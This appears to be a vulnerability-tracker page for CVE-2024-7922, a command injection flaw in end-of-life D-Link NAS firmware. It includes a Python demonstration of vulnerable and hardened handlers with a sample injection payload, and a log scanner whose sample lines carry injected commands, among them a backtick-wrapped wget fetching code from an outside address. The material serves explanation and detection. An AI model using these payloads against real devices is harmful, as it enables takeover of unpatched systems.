CVE-2024-7922

Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)

Published: Aug 19, 2024 / Updated: 3mo ago

CVSS 4.0 base score 5.3 (Medium), from the CVSS 4.0 vector below; NVD CVSS 3.1 base score 9.8 (Critical). EPSS 0.04%.
The two vectors disagree on whether an attacker needs an account on the device (CVSS 3.1: PR:N, CVSS 4.0: PR:L); defenders should plan for the unauthenticated case.

Summary

A vulnerability classified as critical has been identified in multiple D-Link NAS (Network Attached Storage) devices. The affected code is the CGI handler /cgi-bin/myMusic.cgi, which dispatches to several endpoints, including cgi_audio_search, cgi_create_playlist, cgi_get_album_all_tracks, cgi_get_alltracks_editlist, cgi_get_artist_all_album, cgi_get_genre_all_tracks, cgi_get_tracks_list, cgi_set_airplay_content, and cgi_write_playlist. Input reaching these endpoints is passed into a command without being neutralized, so a remote attacker can inject shell commands (CWE-77).
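The pattern behind this bug class, shown as an added example rather than code from the page or from D-Link: the real myMusic.cgi is a native binary whose source is not reproduced here, so the handler below is a constructed stand-in. It assumes the endpoint name arrives in a `cmd` parameter and that cgi_audio_search takes a `keyword` parameter; the `ls` command it builds is invented for the demonstration. The vulnerable form splices the parameter into a shell string; the hardened form allowlists the endpoint names listed in the summary, restricts the keyword to a strict grammar, and execs without a shell.

```python
"""Model of the CWE-77 pattern reported for /cgi-bin/myMusic.cgi (CVE-2024-7922).

Constructed illustration, not D-Link's code. Assumed: the endpoint name arrives
in a `cmd` parameter, cgi_audio_search takes a `keyword` parameter, and the
shell command built from it is an invented stand-in for whatever the firmware runs.
"""
import re
import subprocess
from urllib.parse import parse_qs, urlencode

# Endpoint names from the advisory, used as an allowlist by the hardened handler.
ENDPOINTS = frozenset({
    "cgi_audio_search", "cgi_create_playlist", "cgi_get_album_all_tracks",
    "cgi_get_alltracks_editlist", "cgi_get_artist_all_album",
    "cgi_get_genre_all_tracks", "cgi_get_tracks_list",
    "cgi_set_airplay_content", "cgi_write_playlist",
})
MUSIC_ROOT = "/mnt/HD/music"            # assumed library path
SAFE_KEYWORD = re.compile(r"[A-Za-z0-9 ._-]{1,64}")

# Constructed requests: a benign search and one carrying a shell payload.
BENIGN_QUERY = urlencode({"cmd": "cgi_audio_search", "keyword": "Beatles"})
ATTACK_QUERY = urlencode({"cmd": "cgi_audio_search", "keyword": "'; echo INJECTED; '"})


def vulnerable_search(query_string: str) -> subprocess.CompletedProcess:
    """Vulnerable shape: the untrusted value is spliced into a shell string.

    A single quote closes the literal, `;` ends the command, and whatever
    follows runs as a second command under the CGI process's user.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    keyword = params.get("keyword", [""])[0]
    shell_cmd = f"ls -- '{MUSIC_ROOT}/{keyword}'"
    return subprocess.run(["/bin/sh", "-c", shell_cmd], capture_output=True, text=True)


def hardened_search(query_string: str) -> subprocess.CompletedProcess:
    """Hardened shape: allowlisted endpoint, strict input grammar, no shell."""
    params = parse_qs(query_string, keep_blank_values=True)
    cmd = params.get("cmd", [""])[0]
    if cmd not in ENDPOINTS:
        raise ValueError(f"unknown endpoint {cmd!r}")
    keyword = params.get("keyword", [""])[0]
    if not SAFE_KEYWORD.fullmatch(keyword):
        raise ValueError("keyword contains characters outside the allowed set")
    # argv form: the keyword reaches ls as a single argument and is never
    # parsed by a shell, so metacharacters would be literal bytes, not syntax.
    return subprocess.run(["ls", "--", f"{MUSIC_ROOT}/{keyword}"],
                          capture_output=True, text=True)


def hardened_rejects(query_string: str) -> bool:
    """True when the hardened handler refuses the request before running anything."""
    try:
        hardened_search(query_string)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable handler output:", vulnerable_search(ATTACK_QUERY).stdout.strip())
    print("hardened handler rejects payload:", hardened_rejects(ATTACK_QUERY))
```

Running the module shows `INJECTED` in the vulnerable handler's stdout (the `ls` itself fails, but the injected `echo` still runs), while the hardened handler rejects the same request before any process is spawned. The validation step matters even with the argv form: it keeps the parameter from reaching other sinks (file paths, playlist files) with surprising content.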

Impact

The impact of this vulnerability is severe. It allows remote command injection, which can lead to unauthorized access, data theft, and complete compromise of the device. The attacker can execute arbitrary commands on the affected device with the privileges of the web server process, which on embedded NAS firmware is commonly root. This could result in unauthorized data access, modification of system configuration, installation of malware, or use of the compromised device as a pivot point for further attacks on the network.

Exploitation

Proof-of-concept exploits are available on GitHub (see Exploits below). There is no evidence of exploitation in the wild at the moment.

Patch

A patch is not available for this vulnerability. The vendor, D-Link, has confirmed that the affected products are end-of-life and no longer supported. The recommendation is to retire and replace these devices.

Mitigation

Given that there is no patch available and the affected devices are end-of-life, the primary mitigation is to replace them with newer, supported models. In the interim, if immediate replacement is not possible, consider the following temporary measures:

1. Isolate affected devices: place the vulnerable NAS devices behind a firewall and restrict access to the web interface to only the IP addresses and ports that need it.
2. Disable remote access: where possible, disable remote (Internet-facing) access to the devices and allow only local network access.
3. Monitor for suspicious activity: log and alert on unusual requests to the devices, in particular requests to /cgi-bin/myMusic.cgi from unexpected sources or carrying shell metacharacters in parameters.
4. Regular backups: ensure all data on these devices is regularly backed up to secure, unaffected systems.
5. Accelerate replacement plans: prioritize the replacement of these devices in your organization's hardware refresh cycle.

These measures are temporary; the devices should be replaced as soon as possible to ensure the security of your network and data.
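One way to implement steps 1 to 3 as a detection check, as an added example that is not part of the original advisory: scan web-server access logs for requests to /cgi-bin/myMusic.cgi that either come from outside a trusted network or carry shell metacharacters in a parameter. The sample log lines are constructed, the trusted network 192.168.1.0/24 is an assumption, and the log format is the common Apache/nginx combined format. It checks the query string only; parameters sent in a POST body are not in a standard access log and need request-body logging or a WAF in front of the device.

```python
"""Constructed detection example for the mitigation steps above (not D-Link code).

Flags requests to /cgi-bin/myMusic.cgi that come from outside the trusted LAN
(steps 1 and 2) or that carry shell metacharacters in a parameter (step 3).
Only query-string parameters are visible in a standard access log; POST bodies
need request-body logging or a WAF in front of the device.
"""
import ipaddress
import re
from typing import Iterable, List, Optional
from urllib.parse import parse_qsl, urlsplit

VULN_PATH = "/cgi-bin/myMusic.cgi"
# Characters that change the meaning of a string once a shell parses it.
SHELL_META = re.compile(r"[;&|`$<>\n]")
# Assumed trusted network; adjust to the LAN the NAS is meant to serve.
TRUSTED_NETS = [ipaddress.ip_network("192.168.1.0/24")]
# Combined log format: client ip, identity, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines; the addresses and timestamps are made up.
SAMPLE_LOG = [
    '192.168.1.20 - - [19/Aug/2024:15:10:01 +0000] "GET /cgi-bin/myMusic.cgi?cmd=cgi_audio_search&keyword=Beatles HTTP/1.1" 200 512',
    '203.0.113.45 - - [19/Aug/2024:15:12:44 +0000] "GET /cgi-bin/myMusic.cgi?cmd=cgi_audio_search&keyword=%27%3Bid%3B%27 HTTP/1.1" 200 77',
    '192.168.1.77 - - [19/Aug/2024:15:13:02 +0000] "GET /cgi-bin/myMusic.cgi?cmd=cgi_create_playlist&name=x%60wget+http%3A%2F%2F203.0.113.45%2Fm%60 HTTP/1.1" 200 40',
    '192.168.1.20 - - [19/Aug/2024:15:14:10 +0000] "GET /cgi-bin/info.cgi HTTP/1.1" 200 10',
    '203.0.113.45 - - [19/Aug/2024:15:15:31 +0000] "GET /cgi-bin/myMusic.cgi?cmd=cgi_get_tracks_list HTTP/1.1" 401 0',
]


def is_trusted(ip: str) -> bool:
    """True if the client address falls inside one of the trusted networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_NETS)


def analyze_line(line: str) -> Optional[dict]:
    """Return a finding for a suspicious myMusic.cgi request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if parts.path != VULN_PATH:
        return None
    reasons = []
    if not is_trusted(m["ip"]):
        reasons.append("request from outside trusted network")
    # parse_qsl URL-decodes values, so %3B and %60 become ';' and '`' here.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if SHELL_META.search(value):
            reasons.append(f"shell metacharacter in parameter {key!r}")
    if not reasons:
        return None
    return {"ip": m["ip"], "time": m["ts"], "target": m["target"],
            "status": int(m["status"]), "reasons": reasons}


def scan(lines: Iterable[str]) -> List[dict]:
    """Run analyze_line over a log and collect the findings in order."""
    return [f for f in (analyze_line(l) for l in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["time"], finding["ip"], finding["status"], "; ".join(finding["reasons"]))
```

On the sample data the scan reports three lines: the external request with `';id;'` in the keyword (two reasons), the internal request with a backtick-wrapped download in the playlist name, and the external request that was refused with a 401 but still proves the interface is reachable from outside. A 401 or 200 status does not change the verdict: a successful injection returns 200 like a legitimate search, so the status cannot be used to filter findings.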

NVD CVSS 3.1 vector (base score 9.8, Critical):
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 vector (base score 5.3, Medium):
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Timeline

First Article

Feedly found the first article mentioning CVE-2024-7922.

Aug 19, 2024 at 3:12 PM / CVE
CVSS Estimate

Feedly estimated the CVSS score as HIGH

Aug 19, 2024 at 3:13 PM
Threat Intelligence Report

The vulnerability CVE-2024-7922 has an NVD CVSS 3.1 base score of 9.8, indicating critical severity. It allows command injection in several D-Link NAS devices, potentially leading to unauthorized access to or control of the device. The affected models are end-of-life and no patch is available; other products built on similar firmware components could be affected as well.

Aug 22, 2024 at 8:52 PM
CVSS

A CVSS base score of 9.8 has been assigned.

Oct 28, 2024 at 9:19 PM / nvd

Affected Systems

D-Link DNS-320 firmware

Exploits

https://github.com/BuaaIOTTeam/Iot_Dlink_NAS/blob/main/DNS_cgi_create_playlist.md

Patches

supportannouncement.us.dlink.com (D-Link support announcement: affected products are end-of-life, no firmware fix)

Attack Patterns

CAPEC-136: LDAP Injection (derived from the CWE-77 mapping; the attack described here is OS command injection, CAPEC-88)

References

@RISK: The Consensus Security Vulnerability Alert: Vol. 24, Num. 33 - SANS Institute

News

US-CERT Vulnerability Summary for the Week of August 19, 2024
The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available. Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores: High : vulnerabilities with a CVSS base score of 7.0–10.0 Medium : vulnerabilities with a CVSS base score of 4.0–6.9 Low : vulnerabilities with a CVSS base score of 0.0–3.9 Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links.
Update Mon Aug 26 06:34:06 UTC 2024
Update Sat Aug 24 22:34:16 UTC 2024
Update Sat Aug 24 06:34:06 UTC 2024
Update Fri Aug 23 06:36:18 UTC 2024

CVSS V3.1

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: High
